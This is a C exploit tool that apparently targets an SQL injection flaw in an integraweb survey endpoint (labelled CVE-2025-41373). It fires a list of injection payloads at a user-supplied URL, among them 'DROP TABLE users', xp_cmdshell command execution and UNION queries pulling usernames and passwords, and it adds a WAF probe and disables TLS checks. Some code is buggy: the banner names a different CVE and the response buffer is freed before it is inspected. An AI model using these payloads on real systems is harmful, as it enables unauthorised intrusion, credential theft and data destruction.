/*
* Author : Byte Reaper
* CVE : CVE-2025-41373
* Vulnerability : SQL
* Affected Path : /encuestas/integraweb_v4/integra/html/view/hislistadoacciones.php?idestudio=
* Affected Versions : 2.1.2217.3 to v4.4.2236.1
* Description:
* This endpoint concatenates the `idestudio` parameter directly into an SQL query
* without proper sanitization or parameterization, allowing an attacker to inject
* arbitrary SQL. We leverage both boolean-based and time-based techniques to detect.
*/
#include
#include
#include
#include "argparse.h"
#include
#include
#include
#define FULL_URL 4300
int verbose = 0;
int useC = 0;
const char *url = NULL;
const char *cookies = NULL;
void sleepSyscall(void)
{
struct timespec sleepR;
sleepR.tv_sec = 1;
sleepR.tv_nsec = 0;
__asm__ volatile
(
"mov $35, %%rax\n\t"
"mov %0, %%rdi\n\t"
"xor %%rsi, %%rsi\n\t"
"syscall\n\t"
:
: "r" (&sleepR)
: "rax",
"rdi",
"rsi",
"rcx",
"r11",
"memory"
);
}
void exitAssembly(void )
{
__asm__ volatile
(
"xor %%rdi, %%rdi\n\t"
"mov $0x3C, %%rax\n\t"
"syscall\n\t"
:
:
: "rax",
"rdi"
);
}
void uid(void)
{
const char *mes1 = "\e[1;36m[+] Run Exploit Root Successfully\e[0m\n";
size_t len1 = strlen(mes1);
const char *mes2 = "\e[1;31m[-] Please Run Exploit In Root, Exit...\e[0m\n";
size_t len2 = strlen(mes2);
__asm__ volatile(
"mov $107, %%rax\n\t"
"syscall\n\t"
"cmp $0, %%rax\n\t"
"JZ .root\n\t"
"jmp .not_root\n\t"
".root:\n\t"
"mov $1, %%rax\n\t"
"mov $1, %%rdi\n\t"
"mov %[mes1], %%rsi\n\t"
"mov %[len1], %%rdx\n\t"
"syscall\n\t"
"jmp .end\n\t"
".not_root:\n\t"
"mov $1, %%rax\n\t"
"mov $1, %%rdi\n\t"
"mov %[mes2], %%rsi\n\t"
"mov %[len2], %%rdx\n\t"
"syscall\n\t"
".end:\n\t"
:
: [mes1] "r" (mes1),
[len1] "r" (len1),
[mes2] "r" (mes2),
[len2] "r" (len2)
: "rax",
"rdi",
"rsi",
"rdx",
"rcx",
"r11",
"memory"
);
}
const char *payload[] =
{
"' OR '1'='1",
"\" OR \"1\"=\"1",
"' OR 1=1 --",
"\" OR 1=1 --",
"' OR '1'='1' --",
"' OR 1=1#",
"' OR 1=1/*",
"admin'--",
"admin' #",
"admin'/*",
"' OR 1=1-- -",
"' OR/**/1=1--",
"'/**/OR/**/1=1#",
"' OR%%201=1--",
"' OR%%091=1--",
"' OR%0a1=1--",
"' OR%%0b1=1--",
"' oR 1=1--",
"' Or 1=1--",
"' oR/**/1=1--",
"' OR 0x31=0x31--",
"1; DROP TABLE users --",
"1; EXEC xp_cmdshell('dir') --",
"UNION SELECT NULL,NULL,NULL --",
"UNION SELECT username,password FROM users --",
"' UNION SELECT NULL,NULL,NULL --",
"' UNION SELECT NULL,NULL,NULL#",
",(select * from (select(sleep(4)))a)",
"';WAITFOR DELAY '0:0:4'--",
NULL
};
const char *word[] =
{
"SQL syntax",
"syntax error",
"mysql_fetch",
"mysql_num_rows",
"You have an error in your SQL syntax",
"Warning: mysql",
"Warning: pg_",
"Unclosed quotation mark",
"Microsoft OLE DB Provider for SQL Server",
"Microsoft SQL Native Client error",
"ODBC SQL Server Driver",
"ORA-01756",
"ORA-00933",
"SQLSTATE",
"PDOException",
"invalid query",
"mysql_numrows()",
"mysql_result()",
"mysql_query()",
"Query failed",
"Syntax error",
"DB error",
"error in your SQL syntax",
"Unexpected end of SQL command",
"Incorrect syntax near",
"user",
"admin",
NULL
};
struct Mem
{
char *buffer;
size_t len;
};
size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)
{
size_t total = size * nmemb;
struct Mem *m = (struct Mem *)userdata;
char *tmp = realloc(m->buffer, m->len + total + 1);
if (tmp == NULL)
{
printf("\e[1;31m[-] Failed to allocate memory!\e[0m\n");
exitAssembly();
}
m->buffer = tmp;
memcpy(&(m->buffer[m->len]), ptr, total);
m->len += total;
m->buffer[m->len] = '\0';
return total;
}
void clean(char *buffer, size_t len, CURL *curl,char *encode )
{
free(buffer);
buffer = NULL;
len = 0;
curl_easy_cleanup(curl);
curl_free(encode);
}
int waf = 0;
int wafD(const char *urlW)
{
CURL *curl = curl_easy_init();
CURLcode res;
struct Mem wafServer;
wafServer.buffer= NULL;
wafServer.len = 0;
const char *payloadSql = "OR 1=1 --";
char *encode = curl_easy_escape(curl,
payloadSql,
strlen(payloadSql));
char full[FULL_URL];
if (!encode)
{
printf("\e[1;31m[-] Error Encode Payload !\e[0m\n");
clean(wafServer.buffer,
wafServer.len,
curl,
encode);
exitAssembly();
}
int len = snprintf(full,
sizeof(full),
"%s/encuestas/integraweb_v4/integra/html/view/hislistadoacciones.php?idestudio=%s",
urlW,
encode);
if (len < 0 || (size_t)len >= sizeof(full))
{
printf("\e[1;31m[-] FULL URL Is Long \n");
clean(wafServer.buffer, wafServer.len,curl,encode);
exitAssembly();
}
if (curl == NULL || !curl)
{
printf("\e[1;31m[-] Error Create Object CURL !\e[0m\n");
clean(wafServer.buffer,
wafServer.len,
curl,
encode);
exitAssembly();
}
int result = 0;
if (curl)
{
printf("\e[1;35m===========================================================================================\e[0m\n");
printf("\e[1;35m[+] Scan WAF Start...\e[0m\n");
printf("\e[1;37m[+] FULL URL : %s\e[0m\n", full);
curl_easy_setopt(curl,
CURLOPT_URL,
full);
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
if (verbose)
{
printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n");
curl_easy_setopt(curl,
CURLOPT_VERBOSE,
1L);
}
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&wafServer);
curl_easy_setopt(curl,
CURLOPT_CONNECTTIMEOUT,
5L);
sleepSyscall();
curl_easy_setopt(curl,
CURLOPT_TIMEOUT,
10L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYPEER,
0L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYHOST,
0L);
struct curl_slist *h = NULL;
h = curl_slist_append(h,
"User-Agent: sqlmap");
h = curl_slist_append(h,
"Accept-Encoding: gzip, deflate, br");
h = curl_slist_append(h,
"Accept-Language: en-US,en;q=0.5");
curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h);
res = curl_easy_perform(curl);
curl_slist_free_all(h);
double timeWaf = 0;
if (res == CURLE_OK)
{
int a = 0;
int b =1;
int c = 3;
int d = 4;
long code;
curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE,
&code);
curl_easy_getinfo(curl,
CURLINFO_TOTAL_TIME,
&timeWaf);
printf("\e[1;36m[+] Check Http Code...\e[0m\n");
printf("\e[1;32m[+] Http Code => %ld\e[0m\n", code);
if (code == 500 || code == 403 || code == 406)
{
printf("\e[1;35m---------------------------------------\e[0m\n");
printf("\e[1;34m[+] Http Code (500, 403, 406) ! \e[0m\n");
printf("\e[1;34m[+] Waf Detect (Page Not Found) \e[0m\n");
printf("\e[1;35m--------------------------------------\e[0m\n");
a = 1;
}
else
{
printf("\e[1;31m[-] Not Detected Waf (HTTP CODE) !\e[0m\n");
}
printf("\e[1;36m[+] Check Response Server (NULL)\e[0m\n");
const char *wordWaf[] =
{
"cloudflare",
"sucuri",
"mod_security",
"incapsula",
"akamai",
"f5-big-ip",
"waf",
"firewall",
"blocked",
"access denied",
"forbidden",
"security",
"protected by",
"request rejected",
"webshield",
"ddos protection",
"intrusion prevention",
"proxy server",
"bot detection",
"deny",
"you have been blocked",
"unauthorized",
"client blocked",
"blocked by firewall",
"bad request",
"threat",
"filtering",
"deny access",
"rule id",
NULL
};
if (code >= 200 && code < 300)
{
if (wafServer.buffer)
{
printf("\e[1;35m-------------------------------------------------------------\e[0m\n");
printf("\e[1;34m[+] Http Code (200,202...) ! \e[0m\n");
printf("\e[1;34m[+] Waf Detect, Response is NULL And Http Code Positive \e[0m\n");
printf("\e[1;35m-------------------------------------------------------------\e[0m\n");
b = 1;
}
else
{
printf("\e[1;31m[-] Response Buffer Not NULL\e[0m\n");
printf("\e[1;31m[-] Waf Not Detected (NULL Response)!\e[0m\n");
}
}
printf("\e[1;36m[+] Check Response Buffer...\n");
for (int u = 0; wordWaf[u] != NULL; u++)
{
if (strstr(wafServer.buffer, wordWaf[u]) != NULL)
{
printf("\e[1;35m-------------------------------------------------------------\e[0m");
printf("\e[1;34m[+] Waf Detect, Word Waf Found \e[0m\n");
printf("\e[1;34m[+] Word : %s \e[0m\n", wordWaf[u]);
printf("\e[1;35m-------------------------------------------------------------\e[0m");
c = 1;
}
else
{
if (verbose)
{
printf("\e[1;31m[-] Word Not Found in Response : %s\e[0m\n", wordWaf[u]);
printf("\e[1;35m====================================================\e[0m\n");
}
}
}
printf("\e[1;36m[+] Check Time Response Server...\e[0m\n");
if (timeWaf >= 3.0)
{
printf("\e[1;34m[+] Suspicious delay in response: %.2f sec\e[0m\n", timeWaf);
}
else
{
printf("\e[1;31m[-] Not Detect Waf (Time) !\e[0m\n");
}
printf("\e[1;35m==========================\e[0m\n");
printf("\e[1;33m[+] Result Scan : \e[0m\n");
if (a || b || c || d)
{
printf("\e[1;31m[-] Waf Detected \e[0m\n");
result = 0;
}
else
{
printf("\e[1;34m[+] Not Detect Waf !\e[0m\n");
result =1;
}
printf("\e[1;35m===========================================================================================\e[0m\n");
}
else
{
printf("\e[1;31m[-] No connection reset error.\e[0m\n");
printf("\e[1;31m[-] Error Send Request, Please Check Your Connection !\e[0m\n");
printf("\e[1;31m[-] Error : %s\e[0m\n", curl_easy_strerror(res));
}
}
curl_easy_cleanup(curl);
free(wafServer.buffer);
wafServer.buffer = NULL;
wafServer.len = 0;
return result;
}
void httpRequest(const char *url)
{
CURL *curl = curl_easy_init();
struct Mem response;
CURLcode res;
response.buffer =NULL;
response.len = 0;
if (!curl || curl == NULL)
{
printf("\e[1;31m[-] Error Create Object CURL !\e[0m\n");
printf("\e[1;31m[-] Please Check Your Connection\e[0m\n");
exitAssembly();
}
int y = 0;
if (curl)
{
printf("\e[1;34m[+] Create CURL Successfully\e[0m\n");
for (int pL = 0; payload[pL] != NULL; pL++)
{
char full[FULL_URL];
char *encodePayload = curl_easy_escape(curl,
payload[pL],
strlen(payload[pL]));
if (!encodePayload)
{
printf("\e[1;31m[-] Error Encode Payload !\e[0m\n");
clean(response.buffer,
response.len,
curl,
encodePayload);
exitAssembly();
}
int lenF = snprintf(full, sizeof(full),
"%s/encuestas/integraweb_v4/integra/html/view/hislistadoacciones.php?idestudio=%s",
url,encodePayload);
if (lenF < 0 || (size_t)lenF >= sizeof(full))
{
printf("\e[1;31m[-] FULL URL is LONG ! \n");
clean(response.buffer,
response.len,
curl,
encodePayload);
exitAssembly();
}
printf("\e[1;37m[+] Encode Payload : %s\e[0m\n", encodePayload);
printf("\e[1;37m[+] Base URL : %s\e[0m\n", url);
printf("\e[1;37m[+] Full URL : %s\e[0m\n", full);
char ip[256];
if (sscanf(full, "http://%255[^/]/encuestas/", ip) == 1)
{
printf("\e[1;37m[+] target Ip / Domain : %s\e[0m\n", (char *)ip);
y = 1;
}
else
{
printf("\e[1;31m[-] Error Get Target Ip In FULL URL !\e[0m\n");
y = 0;
}
curl_easy_setopt(curl,
CURLOPT_URL,
full);
if (useC)
{
curl_easy_setopt(curl,
CURLOPT_COOKIEFILE,
cookies);
curl_easy_setopt(curl,
CURLOPT_COOKIEJAR,
cookies);
}
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
if (verbose)
{
printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n");
curl_easy_setopt(curl,
CURLOPT_VERBOSE,
1L);
}
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&response);
curl_easy_setopt(curl,
CURLOPT_CONNECTTIMEOUT,
5L);
sleepSyscall();
curl_easy_setopt(curl,
CURLOPT_TIMEOUT,
10L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYPEER,
0L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYHOST,
0L);
struct curl_slist *headers = NULL;
headers = curl_slist_append(headers,
"Accept-Language: en-US,en");
headers = curl_slist_append(headers,
"Connection: keep-alive");
char r[130];
int lenR = snprintf(r, sizeof(r), "Referer: %s", url);
if (lenR < 0 || (size_t)lenR >= sizeof(r))
{
printf("\e[1;31m[-] Len Header Referer Is long !\e[0m\n");
clean(response.buffer,response.len, curl, encodePayload);
exitAssembly();
}
headers = curl_slist_append(headers,
r);
headers = curl_slist_append(headers, "Cache-Control: no-cache");
headers = curl_slist_append(headers, "Content-Type: application/x_222-form-urlencoded");
if (y == 0)
{
char host[230];
int lenHo = snprintf(host , sizeof(host), "Host: %s",ip);
headers = curl_slist_append(headers, host);
}
headers = curl_slist_append(headers, "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36");
curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers);
res = curl_easy_perform(curl);
curl_slist_free_all(headers);
free(response.buffer);
response.buffer = NULL;
response.len = 0;
time_t start = clock();
if (res == CURLE_OK)
{
long httpCode = 0;
curl_easy_getinfo(curl,
CURLINFO_RESPONSE_CODE,
&httpCode);
printf("\e[1;31m--------------------------------------------------------------------------------------------------------\n");
printf("\e[1;36m[+] Request sent successfully\e[0m\n");
if (response.buffer)
{
printf("\e[1;34m\n======================================== [RESPONSE] ========================================\e[0m\n");
printf("%s\n", response.buffer);
printf("\e[1;34m==============================================================================================\e[0m\n");
}
else
{
printf("\e[1;31m[-] Response Is NULL !\e[0m\n");
}
if (httpCode >= 200 && httpCode < 300)
{
for (int o = 0; word[o] != NULL; o++)
{
printf("\e[1;36m[+] Positive Http Code (200 < 300) : %ld\e[0m\n",httpCode);
if (response.buffer)
{
if (strstr(response.buffer, word[o]) != NULL)
{
printf("\e[1;34m[+] Word Found In Response : %s\e[0m\n", word[o]);
printf("\e[1;34m[+] The vulnerability CVE-2025-41373 exists on the server\e[0m\n");
printf("\e[1;35m\n======================================== [RESPONSE] ========================================\e[0m\n");
printf("%s\n", response.buffer);
printf("\e[1;32m[Len] : %zu\e[0m\n", response.len);
printf("\e[1;35m==============================================================================================\e[0m\n");
}
else
{
if (verbose)
{
printf("\e[1;31m[-] Word Not Found In Response : %s\e[0m\n", word[o]);
}
continue;
}
}
}
time_t end = clock();
double totalTime = (double)(end - start) / CLOCKS_PER_SEC;
if (totalTime <= 5.5) // Payload Sleep 4s + Assembly Sleep (1s) = 4 + 1 + 0.5 (Time (LIBCURL)) = 5.5
{
printf("\e[1;33m[+] Check Time Base....\e[0m\n");
printf("\e[1;34m[+] Time Based Injection Detected .\e[0m\n");
printf("\e[1;34m[+] Total Time Sleep Server : %f\e[0m\n", totalTime);
}
else
{
printf("\e[1;31m [-] Time Based Injection Not Detected !\e[0m\n");
}
}
else
{
printf("\e[1;31m[-] HTTP Code Not Range Positive (200 < 300) : %ld\e[0m\n", httpCode);
}
}
else
{
printf("\e[1;31m[-] Error Send Request\e[0m\n");
printf("\e[1;31m[-] Error : %s\e[0m\n", curl_easy_strerror(res));
}
printf("\e[1;34m[+] Try Next Payload SQL : %s\e[0m\n", encodePayload);
}
}
response.buffer = NULL;
response.len = 0;
curl_easy_cleanup(curl);
}
int main(int argc,
const char **argv)
{
printf(
"\e[1;31m"
"▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▖▖▗ ▄▖▄▖▄▖ \n"
"▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▙▌▜ ▄▌ ▌▄▌ \n"
"▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▌▟▖▄▌ ▌▄▌ \n"
"\e[1;37m \t\tByte Reaper\e[0m\n"
);
curl_global_init(CURL_GLOBAL_DEFAULT);
int noColor = 0;
int w = 0;
struct argparse_option options[] =
{
OPT_HELP(),
OPT_STRING('u',
"url",
&url,
"Target IP "),
OPT_STRING('c',
"cookies",
&cookies,
"cookies File"),
OPT_BOOLEAN('v',
"verbose",
&verbose,
"Verbose Mode"),
OPT_BOOLEAN('w',
"waf",
&w,
"Scan Waf"),
OPT_END(),
};
struct argparse argparse;
argparse_init(&argparse,
options,
NULL,
0);
argparse_parse(&argparse,
argc,
argv);
if (url == NULL)
{
printf("[-] Please Enter Target URL !\n");
printf("[-] Ex : ./exploit -u \n");
curl_global_cleanup();
exitAssembly();
};
printf("---------------------------------------------------------------------\n\n");
printf("[+] Start Exploit (CVE-2025-54589)...\n");
uid();
if (cookies)
{
useC = 1;
}
if (verbose)
{
verbose = 1;
}
if (w)
{
wafD(url);
}
else
{
httpRequest(url);
}
curl_global_cleanup();
return 0;
}
